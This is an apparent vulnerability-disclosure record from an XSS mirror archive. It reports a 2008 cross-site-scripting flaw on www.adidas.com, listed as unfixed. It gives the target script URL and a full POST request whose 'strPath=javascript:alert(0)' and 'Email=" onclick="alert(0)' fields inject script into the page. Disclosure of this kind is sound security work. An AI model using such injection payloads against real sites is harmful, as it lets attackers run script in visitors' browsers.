Security researcher C1c4Tr1Z, has submitted on 18/09/2008 a cross-site-scripting (XSS) vulnerability affecting www.adidas.com, which at the time of submission ranked 4116 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 08/04/2010. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 18/09/2008 |
Date published: 08/04/2010 |
Fixed? Mail us! | Status: UNFIXED |
Author: C1c4Tr1Z |
Domain: www.adidas.com |
Category: XSS |
Pagerank: 4116 |
URL: http://www.adidas.com/scripts/cud/cud2.asp |
POST: msgLoginDetailsSent=Te+hemos+enviado+un+correo+electr%C3%B3nico+con+tus+datos+de+acceso.&msgThankYou =%C2%A1Gracias%21&btnDelete=Borrar&msgDetailsSent=Te+hemos+enviado+tus+datos.&errorEmailNotPresent=L a+direcci%C3%B3n+e-mail+que+has+introducido+no+consta+en+nuestra+base+de+datos.&msgSure=%C2%BFEst%C3 %A1s+seguro%3F&errorNoUserName=Escribe+tu+direcci%C3%B3n+de+correo+electr%C3%B3nico.&errorIncorrectU sernamePassword=La+contrase%C3%B1a+que+usted+introdujo+es+incorrecta.&errorNoPassword=El+campo+Contr ase%C3%B1a+no+puede+estar+vac%C3%ADo.&errorNoEmailId=Escribe+tu+direcci%C3%B3n+de+correo+electr%C3%B 3nico.&msgAccountDeleted=Tu+perfil+se+ha+eliminado+de+adidas.com.+Para+volver+a+registrarte%2C+%3Ca+ href%3Dhttp%3A%2F%2F%3Cservername%3E%2Fscripts%2Fcud%2Fregistration%2Fregister2.asp%3Fstrlang%3D%3Cs trlang%3E%26strBrand%3D%3Cbrand%3E%26strCountry%3D%3Ccountry%3E%26dateofbirth_yyyy%3D%3Cyear%3E%26da teofbirth_dd%3D%3Cday%3E%26dateofbirth_mm%3D%3Cmonth%3E%26purpose%3Dregister%26siteID%3D%3Csiteid%3E %3E%3Cfont+color%3Dblack%3Ehaz+clic+aqu%C3%AD%3C%2Ffont%3E%3C%2Fa%3E&errorInvalidEmailId=Comprueba+l a+direcci%C3%B3n+de+correo+electr%C3%B3nico+introducida.&msgConfirmDelete=Si+haces+click+en+el+bot%C 3%B3n+%27borrar%27+de+abajo%2C+tu+registro+en+adidas.com+se+borrar%C3%A1+inmediatamente.&strCountry= LA&strBrand=Performance&strLang=la&siteID=33&call=EmailAddress2&purpose=login&flgdelete=&strPath=jav ascript:alert(0)&postprocessor=%2Fscripts%2Fcud%2Fregistration%2Fsignup_her.asp&iflag=1&addSite=0&ad dCampaign=1&Email=" onclick="alert(0) |
Click here to view the mirror
|
|
|